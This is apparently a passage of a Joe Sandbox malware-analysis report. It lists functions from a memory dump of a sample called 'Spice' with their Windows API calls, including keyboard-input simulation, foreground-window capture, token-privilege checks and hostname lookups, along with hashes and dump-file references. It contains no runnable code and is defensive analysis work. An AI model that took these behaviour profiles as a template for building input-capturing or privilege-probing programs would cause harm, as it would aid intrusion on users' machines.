Instruction ID: c7e343bae882948501d035af424fcb78643ae0ec1f24cf81146ef1d7545cb3af
Opcode Fuzzy Hash: 2387b1debe6168816e4b0fd14eaab1687eb1ac64fd6b0c73ce0876801d616994
Instruction Fuzzy Hash: 3941BFB1740204AFEB24AF24DC86F3A77E4EB04B14F04D458FA99AB3D2DB709C018B91

Uniqueness

Uniqueness Score: -1.00%

Function 00EE6B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00F00980), ref: 00EE6B92
_strlen.LIBCMT ref: 00EE6BC4

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 867827e72ed67c6964e9fac7040d101ef5bb782e834dc939525611a4cd111c81
Instruction ID: 5ffa5d34edd06571211f73d72cd8a1aa4e717e63eb3571673e20494c671171f1
Opcode Fuzzy Hash: 867827e72ed67c6964e9fac7040d101ef5bb782e834dc939525611a4cd111c81
Instruction Fuzzy Hash: 4E41B071600108ABCB04FB65DD81EAEB3E9EF64350F149155F91AB7292DB30AD01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EF8E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EF8F03

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: c1f9d09e21547c27be687e0e5286fbeddec664d643a2edfef0cbd441c9588f46
Instruction ID: 548f4fc69efc65fd1f04c87dc56d80f64e57c44e64336fa0e342c89f0c9fb670
Opcode Fuzzy Hash: c1f9d09e21547c27be687e0e5286fbeddec664d643a2edfef0cbd441c9588f46
Instruction Fuzzy Hash: 6631EF3270420CAFEF249A18CE49BBC37A6EB05324F246502FB55F61A0DF71EA50DA51

Uniqueness

Uniqueness Score: -1.00%

Function 00EFB1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00EFB1D2
GetWindowRect.USER32(?,?), ref: 00EFB248
PtInRect.USER32(?,?,00EFC6BC), ref: 00EFB258
MessageBeep.USER32(00000000), ref: 00EFB2C9

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 7f084f80dcfcbd73a88d8197f9c85664b77cf9565281c77d29a9c7593ae2d1f1
Instruction ID: bb32e544a138d1d77c26b38ab51f70fbc81f896f5b42c0334a5ee2db5381b59b
Opcode Fuzzy Hash: 7f084f80dcfcbd73a88d8197f9c85664b77cf9565281c77d29a9c7593ae2d1f1
Instruction Fuzzy Hash: 76417F70A0421DDFEB21DF58C884BAD77F5FF49314F1495A5EA18AB261D730A841DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00ED12D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00ED1326
SetKeyboardState.USER32(00000080,?,00000001), ref: 00ED1342
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00ED13A8
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00ED13FA

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 06b31a6a4561e911a406120ee8869853bde1b96904b9fcd09df23da9e532c788
Instruction ID: 7ba85244c21d45ebf479bbb62c6f0885c46b974763f596b60f4d31fa232d348e
Opcode Fuzzy Hash: 06b31a6a4561e911a406120ee8869853bde1b96904b9fcd09df23da9e532c788
Instruction Fuzzy Hash: 6D313770E40208BEFB348A658C05BFE7BAAEB44324F08629BE490727D1D7758D539B51

Uniqueness

Uniqueness Score: -1.00%

Function 00ED1410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00ED1465
SetKeyboardState.USER32(00000080,?,00008000), ref: 00ED1481
PostMessageW.USER32(00000000,00000101,00000000), ref: 00ED14E0
SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00ED1532

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 5d61df86b1a3f5a0f73201472b7bb2381ccca289eb3bb040f21b76083fe513d3
Instruction ID: 2be9afc1da95c6f2a8c426373f2b3a776fb029c01be00e866369f97b3f72018d
Opcode Fuzzy Hash: 5d61df86b1a3f5a0f73201472b7bb2381ccca289eb3bb040f21b76083fe513d3
Instruction Fuzzy Hash: AF316E30E402187EFF348A659C04BFEBBA5EB85314F08639BE4A1723D1C77889539B61

Uniqueness

Uniqueness Score: -1.00%

Function 00EA63F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EA642B
__isleadbyte_l.LIBCMT ref: 00EA6459
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EA6487
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00EA64BD

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: c5c4721aa5c143fa3c1bceb62f3f5d787ecf05356e1e93ec92386d2a4918c4e7
Instruction ID: 9c08e5e878317b8a839700a4ea376b5248893c0384bbfc5a71b09135c3b8f48a
Opcode Fuzzy Hash: c5c4721aa5c143fa3c1bceb62f3f5d787ecf05356e1e93ec92386d2a4918c4e7
Instruction Fuzzy Hash: 6431A131604256AFDB218F75CC44BAA7BB5FF4B314F195029E874AB1A1DB31F850D750

Uniqueness

Uniqueness Score: -1.00%

Function 00EF552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00EF553F

Part of subcall function 00ED3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00ED3B4E
Part of subcall function 00ED3B34: GetCurrentThreadId.KERNEL32 ref: 00ED3B55
Part of subcall function 00ED3B34: AttachThreadInput.USER32(00000000,?,00ED55C0), ref: 00ED3B5C

GetCaretPos.USER32(?), ref: 00EF5550
ClientToScreen.USER32(00000000,?), ref: 00EF558B
GetForegroundWindow.USER32 ref: 00EF5591

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 06f563278bf8850eeb7c7d08e8b64977de8e57dd23f3f36ef26ae63e1d5522b1
Instruction ID: de1ea05b3c3cb069f72bbd33124202199dbaaa1f30ba378a865cc02ce8317c95
Opcode Fuzzy Hash: 06f563278bf8850eeb7c7d08e8b64977de8e57dd23f3f36ef26ae63e1d5522b1
Instruction Fuzzy Hash: D9312EB1900108AFDB10EFB5DD85DEEB7F9EF54304F10506AE515E7241DB71AE018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EFCB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3

GetCursorPos.USER32(?), ref: 00EFCB7A
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00EABCEC,?,?,?,?,?), ref: 00EFCB8F
GetCursorPos.USER32(?), ref: 00EFCBDC
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00EABCEC,?,?,?), ref: 00EFCC16

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 9b28aa14e7a637f7871543c4dacd00f7441f9aff84af00b89dfae79c70404698
Instruction ID: 183a309da52e192740acd692d8ccaf4e735a556395eb2257d15040811b6cab18
Opcode Fuzzy Hash: 9b28aa14e7a637f7871543c4dacd00f7441f9aff84af00b89dfae79c70404698
Instruction Fuzzy Hash: E131C13960011CAFCB259F94CC49EFA7BB5FB49320F244499FA09A7261C7315D50EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E90BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00E90BE2

Part of subcall function 00E8402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00ED7E51,?,?,00000000), ref: 00E84041
Part of subcall function 00E8402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00ED7E51,?,?,00000000,?,?), ref: 00E84065

_fprintf.LIBCMT ref: 00E90C19
OutputDebugStringW.KERNEL32(?), ref: 00EC694C

Part of subcall function 00E94CCA: _flsall.LIBCMT ref: 00E94CE3

__setmode.LIBCMT ref: 00E90C4E

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 0d1d8771c22ecd25da04c001064fe0b5066ae29103f65b06ac3d7d74fadcdc31
Instruction ID: 01090fbc05a3a041c9ef733b7752fe47b7a46026c69c772244ef8699a311281e
Opcode Fuzzy Hash: 0d1d8771c22ecd25da04c001064fe0b5066ae29103f65b06ac3d7d74fadcdc31
Instruction Fuzzy Hash: E11127B1904208AEDF18B7A4AC42EFEB7ADDF41320F14215AF208762C2DF31585357A1

Uniqueness

Uniqueness Score: -1.00%

Function 00EC9274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EC8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EC8D3F
Part of subcall function 00EC8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8D49
Part of subcall function 00EC8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8D58
Part of subcall function 00EC8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8D5F
Part of subcall function 00EC8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EC8D75

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00EC92C1
_memcmp.LIBCMT ref: 00EC92E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00EC931A
HeapFree.KERNEL32(00000000), ref: 00EC9321

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 707aab42cbd9b23e4908ac38d1f74c0861f78fd8c3bb99a5f992a928bd250d39
Instruction ID: 3320f3617e1b354d34e7795640733a87c1d40ceea70c2339753765c1c9ba0594
Opcode Fuzzy Hash: 707aab42cbd9b23e4908ac38d1f74c0861f78fd8c3bb99a5f992a928bd250d39
Instruction Fuzzy Hash: 36216D31D40109EBDB14DF98CA49FEEB7B8EF44305F045059E485BB252D771AA06DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EF634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00EF63BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EF63D7
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EF63E5
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00EF63F3

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 9e89ad7062a7c408d0d77643b885f1212beaf23cf1a1e78e164fc099a9538286
Instruction ID: e8cbd795e711ca3ec6c651148f0ca7a37e392c83f6574624348f940184ca48c4
Opcode Fuzzy Hash: 9e89ad7062a7c408d0d77643b885f1212beaf23cf1a1e78e164fc099a9538286
Instruction Fuzzy Hash: 3311E931305518AFD714AB24CC45FBA77E9FF85320F149118FA16E72D2CBA0AD01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00ECE45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ECF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00ECE46F,?,?,?,00ECF262,00000000,000000EF,00000119,?,?), ref: 00ECF867
Part of subcall function 00ECF858: lstrcpyW.KERNEL32(00000000,?), ref: 00ECF88D
Part of subcall function 00ECF858: lstrcmpiW.KERNEL32(00000000,?,00ECE46F,?,?,?,00ECF262,00000000,000000EF,00000119,?,?), ref: 00ECF8BE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00ECF262,00000000,000000EF,00000119,?,?,00000000), ref: 00ECE488
lstrcpyW.KERNEL32(00000000,?), ref: 00ECE4AE
lstrcmpiW.KERNEL32(00000002,cdecl,?,00ECF262,00000000,000000EF,00000119,?,?,00000000), ref: 00ECE4E2

Strings

cdecl, xrefs: 00ECE4D9

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 52ba1c971e6e2ed74c40283aa033728585b921b6c7031dba250994c7fe9541ac
Instruction ID: 57a4a789cb72b24b23c5aade63e09f8f47f9db6af422a18e9a2cdd2424ba4fe3
Opcode Fuzzy Hash: 52ba1c971e6e2ed74c40283aa033728585b921b6c7031dba250994c7fe9541ac
Instruction Fuzzy Hash: AB11003A200345AFDB29AF24DD05E7A77A9FF45310B80502EF816CB2A0EB329942D791

Uniqueness

Uniqueness Score: -1.00%

Function 00EA5312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00EA5331

Part of subcall function 00E9593C: __FF_MSGBANNER.LIBCMT ref: 00E95953
Part of subcall function 00E9593C: __NMSG_WRITE.LIBCMT ref: 00E9595A
Part of subcall function 00E9593C: RtlAllocateHeap.NTDLL(013A0000,00000000,00000001,?,00000004,?,?,00E91003,?), ref: 00E9597F

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 6e73f375c010b08d13022e94f7bd7e31c06861ecd57c28db836fa2f3e776767e
Instruction ID: 1c1b4c7ac92991644abdc84f2d02f9894dd03da7a65288f57039ab93547c7376
Opcode Fuzzy Hash: 6e73f375c010b08d13022e94f7bd7e31c06861ecd57c28db836fa2f3e776767e
Instruction Fuzzy Hash: 48113A33505E09AFCF213F70AC0079E37D8AF9A3B0F10242AF818BE1A4CE7099449790

Uniqueness

Uniqueness Score: -1.00%

Function 00ED4365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00ED4385
_memset.LIBCMT ref: 00ED43A6
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00ED43F8
CloseHandle.KERNEL32(00000000), ref: 00ED4401

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 52aa2aebe1a41f6f41a913cef614c1011a2208918b80cfd26e7ee09e8c69a71e
Instruction ID: 2f8fbcbbc3c5284fbb9c6d32542c098984da0b962150685787822ece0f53b07e
Opcode Fuzzy Hash: 52aa2aebe1a41f6f41a913cef614c1011a2208918b80cfd26e7ee09e8c69a71e
Instruction Fuzzy Hash: C011E7B190122C7AD7309BA5AC4DFEBBB7CEF44720F10459AF908E72C0D6704E808BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00EE6A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00E8402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00ED7E51,?,?,00000000), ref: 00E84041
Part of subcall function 00E8402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00ED7E51,?,?,00000000,?,?), ref: 00E84065

gethostbyname.WSOCK32(?,?,?), ref: 00EE6A84
WSAGetLastError.WSOCK32(00000000), ref: 00EE6A8F
_memmove.LIBCMT ref: 00EE6ABC
inet_ntoa.WSOCK32(?), ref: 00EE6AC7

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 4a7b6728720e60e8f3b3d377087511b7202b2540ca7397d36c7fc8a06e86867e
Instruction ID: 32a04befb9ceaa03a4c09bd8c35ac8e0f4f91ded04c80fa20043788e0789e03f
Opcode Fuzzy Hash: 4a7b6728720e60e8f3b3d377087511b7202b2540ca7397d36c7fc8a06e86867e
Instruction Fuzzy Hash: 18113A72900109AFCB04FBA4CD46DAEB7F8AF14310B149065F50AB72A2DF31AE14DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EC96F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00EC9719
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC972B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC9741
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EC975C

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: eafa5bb57be0cad3ade85785fe8bec07720668e7df3c38d25cabedf40b6ff90e
Instruction ID: 87cf09887e44789c31ea68dadced874caf05b9e10fc6631bc32a3095e367ace1
